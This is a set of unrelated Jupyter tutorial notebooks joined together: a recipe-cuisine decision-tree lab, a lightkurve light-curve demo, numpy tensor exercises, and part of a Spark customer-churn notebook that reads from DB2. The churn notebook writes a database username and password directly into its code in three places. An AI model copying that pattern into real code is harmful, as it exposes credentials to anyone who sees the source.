From Modeling to Evaluation IntroductionIn this lab, we will continue learning about the data science methodology, and focus on the **Modeling** and **Evaluation** stages.------------ Table of Contents1. [Recap](0)2. [Data Modeling](2)3. [Model Evaluation](4) Recap In Lab **From Understanding to Preparation**, we explored the data and prepared it for modeling. The data was compiled by a researcher named Yong-Yeol Ahn, who scraped tens of thousands of food recipes (cuisines and ingredients) from three different websites, namely: www.allrecipes.com, www.epicurious.com, and www.menupan.com. For more information on Yong-Yeol Ahn and his research, you can read his paper on [Flavor Network and the Principles of Food Pairing](http://yongyeol.com/papers/ahn-flavornet-2011.pdf). Important note: Please note that you are not expected to know how to program in Python. This lab is meant to illustrate the stages of modeling and evaluation of the data science methodology, so it is totally fine if you do not understand the individual lines of code. We have a full course on programming in Python, Python for Data Science, which is also offered on Coursera. So make sure to complete the Python course if you are interested in learning how to program in Python. Using this notebook:To run any of the following cells of code, you can type **Shift + Enter** to execute the code in a cell. Download the libraries and dependencies that we will need to run this lab.
###Code
import pandas as pd # import library to read data into dataframe
pd.set_option("display.max_columns", None)
import numpy as np # import numpy library
import re # import library for regular expression
import random # library for random number generation
###Output
_____no_output_____
###Markdown
We already placed the data on an IBM server for your convenience, so let's download it from the server and read it into a dataframe called **recipes**.
###Code
recipes = pd.read_csv("https://ibm.box.com/shared/static/5wah9atr5o1akuuavl2z9tkjzdinr1lv.csv")
print("Data read into dataframe!") # takes about 30 seconds
###Output
_____no_output_____
###Markdown
We will repeat the preprocessing steps that we implemented in Lab **From Understanding to Preparation** in order to prepare the data for modeling. For more details on preparing the data, please refer to Lab **From Understanding to Preparation**.
###Code
# fix name of the column displaying the cuisine
column_names = recipes.columns.values
column_names[0] = "cuisine"
recipes.columns = column_names
# convert cuisine names to lower case
recipes["cuisine"] = recipes["cuisine"].str.lower()
# make the cuisine names consistent
recipes.loc[recipes["cuisine"] == "austria", "cuisine"] = "austrian"
recipes.loc[recipes["cuisine"] == "belgium", "cuisine"] = "belgian"
recipes.loc[recipes["cuisine"] == "china", "cuisine"] = "chinese"
recipes.loc[recipes["cuisine"] == "canada", "cuisine"] = "canadian"
recipes.loc[recipes["cuisine"] == "netherlands", "cuisine"] = "dutch"
recipes.loc[recipes["cuisine"] == "france", "cuisine"] = "french"
recipes.loc[recipes["cuisine"] == "germany", "cuisine"] = "german"
recipes.loc[recipes["cuisine"] == "india", "cuisine"] = "indian"
recipes.loc[recipes["cuisine"] == "indonesia", "cuisine"] = "indonesian"
recipes.loc[recipes["cuisine"] == "iran", "cuisine"] = "iranian"
recipes.loc[recipes["cuisine"] == "italy", "cuisine"] = "italian"
recipes.loc[recipes["cuisine"] == "japan", "cuisine"] = "japanese"
recipes.loc[recipes["cuisine"] == "israel", "cuisine"] = "jewish"
recipes.loc[recipes["cuisine"] == "korea", "cuisine"] = "korean"
recipes.loc[recipes["cuisine"] == "lebanon", "cuisine"] = "lebanese"
recipes.loc[recipes["cuisine"] == "malaysia", "cuisine"] = "malaysian"
recipes.loc[recipes["cuisine"] == "mexico", "cuisine"] = "mexican"
recipes.loc[recipes["cuisine"] == "pakistan", "cuisine"] = "pakistani"
recipes.loc[recipes["cuisine"] == "philippines", "cuisine"] = "philippine"
recipes.loc[recipes["cuisine"] == "scandinavia", "cuisine"] = "scandinavian"
recipes.loc[recipes["cuisine"] == "spain", "cuisine"] = "spanish_portuguese"
recipes.loc[recipes["cuisine"] == "portugal", "cuisine"] = "spanish_portuguese"
recipes.loc[recipes["cuisine"] == "switzerland", "cuisine"] = "swiss"
recipes.loc[recipes["cuisine"] == "thailand", "cuisine"] = "thai"
recipes.loc[recipes["cuisine"] == "turkey", "cuisine"] = "turkish"
recipes.loc[recipes["cuisine"] == "vietnam", "cuisine"] = "vietnamese"
recipes.loc[recipes["cuisine"] == "uk-and-ireland", "cuisine"] = "uk-and-irish"
recipes.loc[recipes["cuisine"] == "irish", "cuisine"] = "uk-and-irish"
# remove data for cuisines with < 50 recipes:
recipes_counts = recipes["cuisine"].value_counts()
cuisines_indices = recipes_counts > 50
cuisines_to_keep = list(np.array(recipes_counts.index.values)[np.array(cuisines_indices)])
recipes = recipes.loc[recipes["cuisine"].isin(cuisines_to_keep)]
# convert all Yes's to 1's and the No's to 0's
recipes = recipes.replace(to_replace="Yes", value=1)
recipes = recipes.replace(to_replace="No", value=0)
###Output
_____no_output_____
###Markdown
Data Modeling Download and install more libraries and dependencies to build decision trees.
###Code
# import decision trees scikit-learn libraries
%matplotlib inline
from sklearn import tree
from sklearn.metrics import accuracy_score, confusion_matrix
import matplotlib.pyplot as plt
!conda install python-graphviz --yes
import graphviz
from sklearn.tree import export_graphviz
import itertools
###Output
_____no_output_____
###Markdown
Check the data again!
###Code
recipes.head()
###Output
_____no_output_____
###Markdown
[bamboo_tree] Only Asian and Indian CuisinesHere, we are creating a decision tree for the recipes of just some of the Asian (Korean, Japanese, Chinese, Thai) and Indian cuisines. This is because the decision tree does not perform well when the data is biased towards one cuisine, in this case American cuisines. One option is to exclude the American cuisines from our analysis or just build decision trees for different subsets of the data. Let's go with the latter solution. Let's build our decision tree using the data pertaining to the Asian and Indian cuisines and name our decision tree *bamboo_tree*.
###Code
# select subset of cuisines
asian_indian_recipes = recipes[recipes.cuisine.isin(["korean", "japanese", "chinese", "thai", "indian"])]
cuisines = asian_indian_recipes["cuisine"]
ingredients = asian_indian_recipes.iloc[:,1:]
bamboo_tree = tree.DecisionTreeClassifier(max_depth=3)
bamboo_tree.fit(ingredients, cuisines)
print("Decision tree model saved to bamboo_tree!")
###Output
_____no_output_____
###Markdown
Let's plot the decision tree and examine what it looks like.
###Code
export_graphviz(bamboo_tree,
feature_names=list(ingredients.columns.values),
out_file="bamboo_tree.dot",
class_names=np.unique(cuisines),
filled=True,
node_ids=True,
special_characters=True,
impurity=False,
label="all",
leaves_parallel=False)
with open("bamboo_tree.dot") as bamboo_tree_image:
bamboo_tree_graph = bamboo_tree_image.read()
graphviz.Source(bamboo_tree_graph)
###Output
_____no_output_____
###Markdown
The decision tree learned:* If a recipe contains *cumin* and *fish* and **no** *yoghurt*, then it is most likely a **Thai** recipe.* If a recipe contains *cumin* but **no** *fish* and **no** *soy_sauce*, then it is most likely an **Indian** recipe. You can analyze the remaining branches of the tree to come up with similar rules for determining the cuisine of different recipes. Feel free to select another subset of cuisines and build a decision tree of their recipes. You can select some European cuisines and build a decision tree to explore the ingredients that differentiate them. Model Evaluation To evaluate our model of Asian and Indian cuisines, we will split our dataset into a training set and a test set. We will build the decision tree using the training set. Then, we will test the model on the test set and compare the cuisines that the model predicts to the actual cuisines. Let's first create a new dataframe using only the data pertaining to the Asian and the Indian cuisines, and let's call the new dataframe **bamboo**.
###Code
bamboo = recipes[recipes.cuisine.isin(["korean", "japanese", "chinese", "thai", "indian"])]
###Output
_____no_output_____
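###Markdown
Before evaluating, here is a sketch of the European-cuisines exercise suggested above (the cuisine names are assumptions about which ones survive the earlier >50-recipe filter):
###Code
european_recipes = recipes[recipes.cuisine.isin(["italian", "french", "german", "spanish_portuguese"])]
european_tree = tree.DecisionTreeClassifier(max_depth=3)
european_tree.fit(european_recipes.iloc[:, 1:], european_recipes["cuisine"])
###Output
_____no_output_____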
###Markdown
Let's see how many recipes exist for each cuisine.
###Code
bamboo["cuisine"].value_counts()
###Output
_____no_output_____
###Markdown
Let's remove 30 recipes from each cuisine to use as the test set, and let's name this test set **bamboo_test**.
###Code
# set sample size
sample_n = 30
###Output
_____no_output_____
###Markdown
Create a dataframe containing 30 recipes from each cuisine, selected randomly.
###Code
# take 30 recipes from each cuisine
np.random.seed(1234) # set random seed (pandas .sample draws from NumPy's global RNG, not Python's random module)
bamboo_test = bamboo.groupby("cuisine", group_keys=False).apply(lambda x: x.sample(sample_n))
bamboo_test_ingredients = bamboo_test.iloc[:,1:] # ingredients
bamboo_test_cuisines = bamboo_test["cuisine"] # corresponding cuisines or labels
###Output
_____no_output_____
###Markdown
Check that there are 30 recipes for each cuisine.
###Code
# check that we have 30 recipes from each cuisine
bamboo_test["cuisine"].value_counts()
###Output
_____no_output_____
###Markdown
Next, let's create the training set by removing the test set from the **bamboo** dataset, and let's call the training set **bamboo_train**.
###Code
bamboo_test_index = bamboo.index.isin(bamboo_test.index)
bamboo_train = bamboo[~bamboo_test_index]
bamboo_train_ingredients = bamboo_train.iloc[:,1:] # ingredients
bamboo_train_cuisines = bamboo_train["cuisine"] # corresponding cuisines or labels
###Output
_____no_output_____
###Markdown
Check that there are 30 _fewer_ recipes now for each cuisine.
###Code
bamboo_train["cuisine"].value_counts()
###Output
_____no_output_____
###Markdown
Let's build the decision tree using the training set, **bamboo_train**, and name the generated tree **bamboo_train_tree** for prediction.
###Code
bamboo_train_tree = tree.DecisionTreeClassifier(max_depth=15)
bamboo_train_tree.fit(bamboo_train_ingredients, bamboo_train_cuisines)
print("Decision tree model saved to bamboo_train_tree!")
###Output
_____no_output_____
###Markdown
Let's plot the decision tree and explore it.
###Code
export_graphviz(bamboo_train_tree,
feature_names=list(bamboo_train_ingredients.columns.values),
out_file="bamboo_train_tree.dot",
class_names=np.unique(bamboo_train_cuisines),
filled=True,
node_ids=True,
special_characters=True,
impurity=False,
label="all",
leaves_parallel=False)
with open("bamboo_train_tree.dot") as bamboo_train_tree_image:
bamboo_train_tree_graph = bamboo_train_tree_image.read()
graphviz.Source(bamboo_train_tree_graph)
###Output
_____no_output_____
###Markdown
Now that we defined our tree to be deeper, more decision nodes are generated. Now let's test our model on the test data.
###Code
bamboo_pred_cuisines = bamboo_train_tree.predict(bamboo_test_ingredients)
###Output
_____no_output_____
###Markdown
To quantify how well the decision tree is able to determine the cuisine of each recipe correctly, we will create a confusion matrix which presents a nice summary on how many recipes from each cuisine are correctly classified. It also sheds some light on what cuisines are being confused with what other cuisines. So let's go ahead and create the confusion matrix for how well the decision tree is able to correctly classify the recipes in **bamboo_test**.
###Code
test_cuisines = np.unique(bamboo_test_cuisines)
bamboo_confusion_matrix = confusion_matrix(bamboo_test_cuisines, bamboo_pred_cuisines, labels=test_cuisines)
title = 'Bamboo Confusion Matrix'
cmap = plt.cm.Blues
plt.figure(figsize=(8, 6))
bamboo_confusion_matrix = (
bamboo_confusion_matrix.astype('float') / bamboo_confusion_matrix.sum(axis=1)[:, np.newaxis]
) * 100
plt.imshow(bamboo_confusion_matrix, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(test_cuisines))
plt.xticks(tick_marks, test_cuisines)
plt.yticks(tick_marks, test_cuisines)
fmt = '.2f'
thresh = bamboo_confusion_matrix.max() / 2.
for i, j in itertools.product(range(bamboo_confusion_matrix.shape[0]), range(bamboo_confusion_matrix.shape[1])):
plt.text(j, i, format(bamboo_confusion_matrix[i, j], fmt),
horizontalalignment="center",
color="white" if bamboo_confusion_matrix[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.show()
###Output
_____no_output_____
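###Markdown
accuracy_score was imported earlier alongside confusion_matrix but not used above; as a quick complementary check of overall accuracy on the same predictions:
###Code
print("Overall accuracy on bamboo_test: {:.2f}%".format(accuracy_score(bamboo_test_cuisines, bamboo_pred_cuisines) * 100))
###Output
_____no_output_____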
###Markdown
After running the above code, you should get a confusion matrix similar to the reference one described here (the reference image is omitted): The rows represent the actual cuisines from the dataset and the columns represent the predicted ones. Each row should sum to 100%. According to this confusion matrix, we make the following observations:* Using the first row in the confusion matrix, 60% of the **Chinese** recipes in **bamboo_test** were correctly classified by our decision tree, whereas 37% of the **Chinese** recipes were misclassified as **Korean** and 3% were misclassified as **Indian**.* Using the Indian row, 77% of the **Indian** recipes in **bamboo_test** were correctly classified by our decision tree, while 3% of the **Indian** recipes were misclassified as **Chinese**, 13% were misclassified as **Korean**, and 7% were misclassified as **Thai**. **Please note** that because the training set is drawn randomly (and the tree-building algorithm itself breaks ties between features randomly), you may not get the same results every time you create the decision tree, even using the same training set. The performance should still be comparable though! So don't worry if you get slightly different numbers in your confusion matrix than the ones shown above. Using the reference confusion matrix, what percentage of **Japanese** recipes was correctly classified by our decision tree?
###Code
Your Answer:
###Output
_____no_output_____
###Markdown
Double-click __here__ for the solution.<!-- The correct answer is:36.67%.--> Also using the reference confusion matrix, what percentage of **Korean** recipes was misclassified as **Japanese**?
###Code
Your Answer:
###Output
_____no_output_____
###Markdown
Double-click __here__ for the solution.<!-- The correct answer is:3.33%.--> What cuisine has the least number of recipes correctly classified by the decision tree using the reference confusion matrix?
###Code
Your Answer:
###Output
_____no_output_____
Interns/Olivia/What_are_LightCurve_objects?.ipynb | ###Markdown
###Code
!pip install lightkurve
from lightkurve import search_targetpixelfile
# First we open a Target Pixel File from MAST, this one is already cached from our previous tutorial!
tpf = search_targetpixelfile('KIC 6922244', quarter=4).download()
# Then we convert the target pixel file into a light curve using the pipeline-defined aperture mask.
lc = tpf.to_lightcurve(aperture_mask=tpf.pipeline_mask)
lc.mission
lc.quarter
lc.time, lc.flux
lc.estimate_cdpp()
%matplotlib inline
lc.plot();
###Output
_____no_output_____
###Markdown
There are a set of useful functions in LightCurve objects which you can use to work with the data. These include: * flatten(): Remove long term trends using a Savitzky–Golay filter * remove_outliers(): Remove outliers using simple sigma clipping * remove_nans(): Remove infinite or NaN values (these can occur during thruster firings) * fold(): Fold the data at a particular period * bin(): Reduce the time resolution of the array, taking the average value in each bin.
###Code
flat_lc = lc.flatten(window_length=401)
flat_lc.plot();
folded_lc = flat_lc.fold(period=3.5225)
folded_lc.plot();
binned_lc = folded_lc.bin(binsize=10)
binned_lc.plot();
lc.remove_nans().flatten(window_length=401).fold(period=3.5225).bin(binsize=10).plot();
###Output
_____no_output_____
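###Markdown
The function list above also mentions remove_outliers(), which the chained example skips; a minimal sketch of adding it to the chain (sigma=5 is lightkurve's default clipping threshold):
###Code
lc.remove_outliers(sigma=5).flatten(window_length=401).fold(period=3.5225).bin(binsize=10).plot();
###Output
_____no_output_____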
notebooks/DescriptorGen-networkxGraph-pristine-Mo2C.ipynb | ###Markdown
Calculate reference energies
###Code
# From DFT
E_H2Og = -.14220313E+02
E_H2g = -6.7709484
# Derived values
E_Hg = E_H2g/2.
# O2 gas correction
deltaG = -4.708
TdeltaS = -0.7024
deltaE_ZPE = 0.48
deltaH = deltaG+TdeltaS-deltaE_ZPE
E_O2g = 2*E_H2Og-2*E_H2g-deltaH
E_Og = E_O2g/2.
print('Corrected O2 gas in eV = ',E_O2g)
# adsorbate compositions
E_gas = {'H2': E_H2g, 'H2O':E_H2Og,'H':E_Hg,'O':E_Og}
# To get clean energies
fname = 'Oads_Mo2C_pristine_MDF.db'
db = ase.db.connect(fname)
indexItermList = []
for row in db.select('fmax<=0.05'): # collect clean energies from converged systems
index=row.data.index
iterm=row.data.iterm
indexIterm = index+'_'+iterm
if indexIterm not in indexItermList:
indexItermList.append(indexIterm)
E_clean = dict.fromkeys(indexItermList)
cleanSurfaceList = []
for row in db.select('fmax<=0.05'): # collect clean energies from converged systems
if row.data.adsorbate=='clean':
idx = row.data.index
iterm = row.data.iterm
idxIterm = idx+'_'+iterm
e = row.energy
E_clean[idxIterm]=e
cleanSurfaceList.append((row.id,idx,iterm,e,'Mo2C_'+idxIterm))
print(E_clean)
print(len(E_clean))
dfCleanSurface = pd.DataFrame(cleanSurfaceList,columns=['databaseRowID','Index','Termination','TotalE','Name'])
###Output
_____no_output_____
###Markdown
Compute binding energies and generate graphs
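The binding energy computed in the loop below is $E_{BE} = E_{\mathrm{slab+ads}} - E_{\mathrm{clean}} - E_{\mathrm{gas}}$, using the clean-surface energies (`E_clean`) and gas-phase references (`E_gas`) collected above.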
###Code
import os
import time
start_time = time.time()
X = []
y_bindingE = []
y_totalE = []
rowID = []
surfaceIndex=[]
surfaceTerminations=[]
adsDistinctList = []
adsList = []
adsIsomerList = []
adsConfigurationList = []
adsIndicesList = []
distMaxList = []
distMaxAdsList = []
graphNameList = []
fname = 'Oads_Mo2C_pristine_MDF.db'
db = ase.db.connect(fname)
features = []
iniDir = 'Oads_Mo2C_pristine_ini_graphml'
finDir = 'Oads_Mo2C_pristine_fin_graphml'
os.makedirs(iniDir, exist_ok=True)  # exist_ok so the cell can be rerun safely
os.makedirs(finDir, exist_ok=True)
for row in db.select('fmax<=0.05'):
idx = row.data.index
iterm = row.data.iterm
idxIterm = idx+'_'+iterm
BE= row.energy-E_clean[idxIterm]-E_gas[row.data.adsorbate]
finAtoms = db.get_atoms(row.id)
iniAtoms = db.get_atoms(row.id)
iniPos = db.get(row.id).data.initialPositions
adsIndices = db.get(row.id).data.adsorbateIndices
iniAtoms.set_positions(iniPos)
finAds = finAtoms[adsIndices[0]:]
pwdistTup = get_distances(iniAtoms.positions,finAtoms.positions,cell=iniAtoms.get_cell(),pbc=True)
pwdist = np.diagonal(pwdistTup[1])
distMax = np.amax(pwdist)
if len(adsIndices)>1: # Measure distance(s) from O to H(s)
pwdistAds = finAtoms.get_distances(a=adsIndices[0],indices=adsIndices[1:])
distMaxAds = np.amax(pwdistAds)
else:
distMaxAds = 0.
if row.data.adsorbate not in adsDistinctList: adsDistinctList.append(row.data.adsorbate)
graphName = 'Mo2C_'+str(row.data.index)+'_'+str(row.data.iterm)+'_'+row.data.adsorbate+'_'+str(row.data.adsorbateIsomer)+'_'+str(row.data.adsorbateConfiguration)+'_'+str(row.id)
nnNeighborSelfBond = True
G = adsGraphGen(iniAtoms,adsIndices,graphName,row.energy)
Gf = adsGraphGen(finAtoms,adsIndices,graphName,row.energy)
nx.write_graphml(G,iniDir+'/'+graphName+'.graphml')
nx.write_graphml(Gf,finDir+'/'+graphName+'.graphml')
graphNameList.append(graphName)
y_bindingE.append(BE)
y_totalE.append(row.energy)
rowID.append(row.id)
surfaceIndex.append(str(row.data.index))
surfaceTerminations.append(str(row.data.iterm))
adsList.append(row.data.adsorbate)
adsIsomerList.append(str(row.data.adsorbateIsomer))
adsConfigurationList.append(str(row.data.adsorbateConfiguration))
adsIndicesList.append(adsIndices)
distMaxList.append(distMax)
distMaxAdsList.append(distMaxAds)
print("--- %s seconds ---" % (time.time() - start_time))
###Output
_____no_output_____
Notebooks/array_matrix_manipulation.ipynb | ###Markdown
Applications of AI: - Speech recognition - NLP - Image recognition
###Code
# # ML
# Provides computers with the ability to learn without being explicitly programmed
###Output
_____no_output_____
###Markdown
Limitations of ML
###Code
# Make a vector in numpy
import numpy as np
v = np.array([5, 2, 1])
print(v)
print(v.shape)
v[1]
v.shape
v = np.array([[5, 2, 1]])
# print(v)
print(v.shape)
v_t = np.transpose(v)
print(v_t)
v_t.shape # (3, 1) = (row, column)
v[0]
v[0][1]
# in DS-2.2 our input should be a 2D array
# Make a matrix
matrix = np.array([[1,2,3], [2, 0, 1]])
print(matrix)
print(matrix.shape)
print(matrix.size) # size is number of elements
matrix_t = np.transpose(matrix)
print(matrix_t)
print(matrix_t.shape)
print(matrix_t.size)
# Arrange or reshape the matrix (2D array or 2D Tensor)
v_2 = np.array([[1,2,3], [2, 0, 1]])
print("reshape to (3, 2) (same shape as the transpose, but a different element order): ", v_2.reshape(3, 2))
# By applying the following reshapes we transform the matrix into a 3D tensor
print("Specified 1st parameter: ", v_2.reshape(3, 1, 2))
print("UNSpecified 1st parameter: ", v_2.reshape(-1, 1, 2))
# Make a 3D Tensor in numpy
v = np.array([[[1., 2.,3.], [4.,5.,6.]], [[7.,8.,9.], [11.,12.,13.]]])
print(v)
# The first element of shape is the number of 2D slices; the second and third are each slice's dimensions
print(v.shape)
print(v[0])
print(v[1])
# print(v[2]) this gives error because we have only 2 depth
print(v.size) # 12
print(v.reshape(3, 2, -1)) # this equals to v.reshape(3, 2, 2)
print(v.reshape(3, 1, -1))
print(v.reshape(3, -1, 1)) # one column; '-1' resolves to 4 here (the number of rows)
# Make a 4D Tensor Matrix
v_4 = np.zeros((2, 3, 5, 5))
print(v_4)
# Make 5D Tensor in numpy
v_5 = np.zeros((2, 2, 3, 5, 5)) # 2 by 2 and depth is 3 and the 5 by 5
print(v_5)
print(v[0][0].shape)
print(v[0][1].shape)
print(v[1][0].shape)
print(v[1][1].shape)
# Matrix Multiplication
a = np.array([[4,2,3], [2,0,1]])
# transpose the array
b = np.transpose(a)
# find the dot product of a and b
c = np.dot(a, b)
print(c)
d = np.dot(b, a)
print(d)
# dot product of a and b is not the same as dot product of b and a!!!!
# Element-wise multiplication of matrix
# 1st observation: for element-wise multiplication the matrices must have the same dimensions
# 2nd observation: it is commutative
a = np.array([[1, 2], [3, 4]])
b = np.array([[5, 6], [7, 8]])
print(np.multiply(a,b))
print(np.multiply(b,a))
print(a*b)
print(b*a)
###Output
[[ 5 12]
[21 32]]
[[ 5 12]
[21 32]]
[[ 5 12]
[21 32]]
[[ 5 12]
[21 32]]
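###Markdown
To close the loop on the multiplication examples above: NumPy also supports the @ operator, which for 2D arrays is equivalent to np.dot (a quick sketch reusing the same matrices):
###Code
a = np.array([[1, 2], [3, 4]])
b = np.array([[5, 6], [7, 8]])
print(a @ b)         # matrix product, same as np.dot(a, b) for 2D arrays
print(np.dot(a, b))  # identical result
###Output
_____no_output_____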
src/dsx/CustomerChurnAnalysisDSXICP.ipynb | ###Markdown
Evaluate and predict customer churnThis notebook is an adaptation of the work done by [Sidney Phoon and Eleva Lowery](https://github.com/IBMDataScience/DSX-DemoCenter/tree/master/DSX-Local-Telco-Churn-master) with the following modifications:* Use datasets persisted in DB2 Warehouse running on ICP* Deploy and run the notebook on DSX Local running on IBM Cloud Private (ICP)* Run Spark machine learning jobs on ICP as part of the worker nodes.* Document some actions for a beginner data scientist / developer who wants to understand what's going on.The goal is to demonstrate how to build a predictive model with the Spark machine learning API (SparkML) to predict customer churn, and deploy it for scoring in Machine Learning (ML) running on ICP. There is an equivalent notebook to run on Watson Data Platform and Watson Machine Learning. ScopeMany industries face the issue of customers moving to competitors when product differentiation is weak or there are customer support issues. One industry illustrating this problem is the telecom industry, with mobile, internet and IP TV product offerings. Notebook explanationsThe notebook follows the classical data science modeling steps: load the data, prepare the data, analyze the data (iterating on those two activities), build a model, validate the accuracy of the model, deploy the model, and consume the model as a service. This Jupyter notebook uses Apache Spark to run the machine learning jobs that build decision trees with a random forest classifier to assess when a customer is at risk of moving to a competitor. Apache Spark offers a Python module called pyspark to operate on data and use ML constructs. Start with all importsA best practice for notebook implementation is to do the imports at the top of the notebook:* [Spark SQLContext](https://spark.apache.org/docs/latest/sql-programming-guide.html) a Spark module to process structured data* spark conf to access the Spark cluster configuration and be able to execute queries* [pandas](https://pandas.pydata.org) Python library for data analysis* [brunel](https://github.com/Brunel-Visualization/Brunel/wiki) API and tool to visualize data quickly* [pixiedust](www.ibm.com/PixieDust) Visualize data inside Jupyter notebooksThe first cell below executes system commands to update the kernel with the required dependent libraries.
###Code
# Library required for pixiedust - a visualization and dashboarding framework
!pip install --user --upgrade pixiedust
import pyspark
import pandas as pd
import brunel
import numpy as np
from pyspark.sql import SQLContext
from pyspark.conf import SparkConf
from pyspark.sql import SparkSession
from pyspark.sql.types import DoubleType
from pyspark.sql.types import DecimalType
from pyspark.sql.types import IntegerType
from pyspark.sql.types import LongType
from pyspark.ml.feature import OneHotEncoder, StringIndexer, VectorIndexer, IndexToString
from pyspark.ml import Pipeline
from pyspark.ml.feature import VectorAssembler
from pyspark.ml.classification import RandomForestClassifier
from pyspark.ml.evaluation import BinaryClassificationEvaluator
from pixiedust.display import *
###Output
Pixiedust database opened successfully
###Markdown
Load data from DB2DSX ICP can be used to bring in data from multiple sources including but not limited to, files, datastores on cloud as well as on premises. DSX ICP includes features to connect to data sources, bring in the data, refine, and then perform analytics.In this sample we connect to DB2 Data Warehouse deployed on ICP and bring data about customer, call notes and marketing campaign in.
###Code
import dsx_core_utils
dataSet = dsx_core_utils.get_remote_data_set_info('CUSTOMER')
dataSource = dsx_core_utils.get_data_source_info(dataSet['datasource'])
print(dataSource)
dbTableOrQuery = dataSet['schema'] + '.' + dataSet['table']
print(dbTableOrQuery)
sparkSession = SparkSession(sc).builder.getOrCreate()
df_customer_transactions = sparkSession.read.format("jdbc").option("url", dataSource['URL']).option("dbtable",dbTableOrQuery).option("user",'BLUADMIN').option("password","changemeplease").load()
df_customer_transactions.show(5)
df_customer_transactions.printSchema()
dataSet = dsx_core_utils.get_remote_data_set_info('CALLNOTES')
dataSource = dsx_core_utils.get_data_source_info(dataSet['datasource'])
print(dataSource)
dbTableOrQuery = dataSet['schema'] + '.' + dataSet['table']
print(dbTableOrQuery)
sparkSession = SparkSession(sc).builder.getOrCreate()
df_call_notes = sparkSession.read.format("jdbc").option("url", dataSource['URL']).option("dbtable",dbTableOrQuery).option("user",'BLUADMIN').option("password","changemeplease").load()
df_call_notes.show(5)
df_call_notes.printSchema()
dataSet = dsx_core_utils.get_remote_data_set_info('CAMPAIGNRESPONSES_EXPANDED')
dataSource = dsx_core_utils.get_data_source_info(dataSet['datasource'])
print(dataSource)
dbTableOrQuery = dataSet['schema'] + '.' + dataSet['table']
print(dbTableOrQuery)
sparkSession = SparkSession(sc).builder.getOrCreate()
df_campaign_responses = sparkSession.read.format("jdbc").option("url", dataSource['URL']).option("dbtable",dbTableOrQuery).option("user",'BLUADMIN').option("password","changemeplease").load()
df_campaign_responses.show(5)
df_campaign_responses.printSchema()
###Output
{u'description': u'', u'URL': u'jdbc:db2://172.16.40.131:32166/BLUDB', 'driver_class': 'com.ibm.db2.jcc.DB2Driver', u'dsx_artifact_type': u'datasource', u'shared': True, u'type': u'DB2', u'name': u'CUSTOMER'}
BLUADMIN.CAMPAIGNRESPONSES_EXPANDED
+----+------------------+---------------------------+-------------------------------------+
| ID|RESPONDED_CAMPAIGN|OWNS_MULTIPLE_PHONE_NUMBERS|AVERAGE_TEXT_MESSAGES__90_DAY_PERIOD_|
+----+------------------+---------------------------+-------------------------------------+
|3064| Kids Tablet| Y| 1561|
|3077| Kids Tablet| Y| 1225|
|3105| Kids Tablet| Y| 1661|
|3106| Kids Tablet| N| 2498|
|3108| Kids Tablet| N| 1118|
+----+------------------+---------------------------+-------------------------------------+
only showing top 5 rows
root
|-- ID: integer (nullable = true)
|-- RESPONDED_CAMPAIGN: string (nullable = true)
|-- OWNS_MULTIPLE_PHONE_NUMBERS: string (nullable = true)
|-- AVERAGE_TEXT_MESSAGES__90_DAY_PERIOD_: integer (nullable = true)
###Markdown
Data PreparationThe next few steps involve a series of data preparation tasks such as filling the missing values, joining datasets etc. The following cell fills the null values for average SMS count and replaces Nulls with spaces for other fields.
###Code
df_campaign_responses = df_campaign_responses.na.fill({'AVERAGE_TEXT_MESSAGES__90_DAY_PERIOD_':'0'})
df_call_notes = df_call_notes.na.fill({'SENTIMENTS':' '})
df_call_notes = df_call_notes.na.fill({'KEYWORD1':' '})
df_call_notes = df_call_notes.na.fill({'KEYWORD2':' '})
###Output
_____no_output_____
###Markdown
In the following cell we join some of the customer and call note data sources using the ID field. This ID field is the one coming from the CUSTOMER DB2 transactional database.
###Code
data_joined_callnotes_churn = df_call_notes.join(df_customer_transactions,df_call_notes['ID']==df_customer_transactions['ID'],'inner').select(df_call_notes['SENTIMENTS'],df_call_notes['KEYWORD1'],df_call_notes['KEYWORD2'],df_customer_transactions['*'])
data_joined_callnotes_churn_campaign = df_campaign_responses.join(data_joined_callnotes_churn,df_campaign_responses['ID']==data_joined_callnotes_churn['ID'],'inner').select(data_joined_callnotes_churn['*'],df_campaign_responses['RESPONDED_CAMPAIGN'],df_campaign_responses['OWNS_MULTIPLE_PHONE_NUMBERS'],df_campaign_responses['AVERAGE_TEXT_MESSAGES__90_DAY_PERIOD_'])
data_joined_callnotes_churn_campaign.take(5)
###Output
_____no_output_____
###Markdown
The following code block is intended to give a feel for the Spark DataFrame APIs. We fix some of the column titles to improve readability and remove a duplicate column (Status and Marital Status are the same). Finally, we convert the DataFrame to a pandas structure for visualization. Since some fields come out of the DB2 tables as string types, let us also change some of them to more appropriate types.
###Code
# Change some column names
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumnRenamed("SENTIMENTS", "SENTIMENT").withColumnRenamed("OWNS_MULTIPLE_PHONE_NUMBERS","OMPN")
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumnRenamed("KEYWORD1", "KEYWORD_COMPONENT").withColumnRenamed("KEYWORD2","KEYWORD_QUERY")
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumnRenamed("AVERAGE_TEXT_MESSAGES__90_DAY_PERIOD_", "SMSCOUNT").withColumnRenamed("CAR_OWNER","CAROWNERSHIP")
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumnRenamed("MARITAL_STATUS", "MARITALSTATUS").withColumnRenamed("EST_INCOME","INCOME")
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.drop('Status')
# Change some of the data types
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("CHILDREN", data_joined_callnotes_churn_campaign["CHILDREN"].cast(IntegerType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("INCOME", data_joined_callnotes_churn_campaign["INCOME"].cast(DecimalType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("AGE", data_joined_callnotes_churn_campaign["AGE"].cast(IntegerType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("LONGDISTANCE", data_joined_callnotes_churn_campaign["LONGDISTANCE"].cast(DecimalType()))
data_joined_callnotes_churn_campaign = data_joined_callnotes_churn_campaign.withColumn("INTERNATIONAL", data_joined_callnotes_churn_campaign["INTERNATIONAL"].cast(DecimalType()))
